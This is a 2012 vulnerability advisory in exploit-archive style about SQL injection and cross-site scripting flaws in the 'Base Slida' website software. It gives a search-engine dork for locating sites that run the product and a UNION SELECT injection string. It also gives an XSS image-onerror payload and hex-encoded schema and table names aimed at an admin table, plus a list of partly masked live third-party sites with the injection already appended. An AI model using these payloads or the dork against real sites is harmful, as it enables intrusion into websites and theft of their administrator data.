-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= INDEPENDENT SECURITY RESEARCHER PENETRATION TESTING SECURITY -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= # Author: Ur0b0r0x # Tiwtte: @Ur0b0r0x # Email: ur0b0r0x_@live.com # Line: GreyHat # Exploit Title: Base Slida - SQL Injection / Cross-Site Scripting Vulnerabilities # Dork: intext:"Sitio Dise&#241;ado y Desarrollado por: Base Slida" # Date: 13/11/2012 # Author: Ur0b0r0x # Url Vendor: http://www.basesolida.com.co/ # Vendor Name: Base Slida # Tested On: Backtrack R3 / Linux Mint # Type: php ------------------- Agreement -------------------- [05/11/2012] - Vulnerability discovered [08/11/2012] - Vendor notified Dont responsed [13/11/2012] - Public disclosure -------------------------------------------------- # Expl0it/P0c ################### http://site.com/Sitio/Index.asp?LANG=&IP= < Sql Vulnerability Path > http://site.com/Sitio/Index.asp?LANG=&IP= < Xss Vulnerability Path > # Exploit/Comand/Sql=> +union+select+1,2,3,4,5,6,7,8,9,10%% # Exploit/Comand/Xss=> "><img src=x onerror=alert("ur0b0r0x");> # Payload/Comand/Sql=> table_schema=0x61646D696E6973747261646F72E / table_name=0x74626C5F6175695F61646D696 # Demo_Xss_Sql_Vulnerabilities http://www.aireamXXXte.com/Sitio/Index.asp?LANG=&IP=62' http://www.pinaXXXdu.co/Sitio/Index.asp?LANG=&IP=115' http://www.autoXXXncia.com/Sitio/Index.asp?LANG=&IP=299' http://www.pXXXopal.com/Sitio/Index.asp?LANG=&IP=98'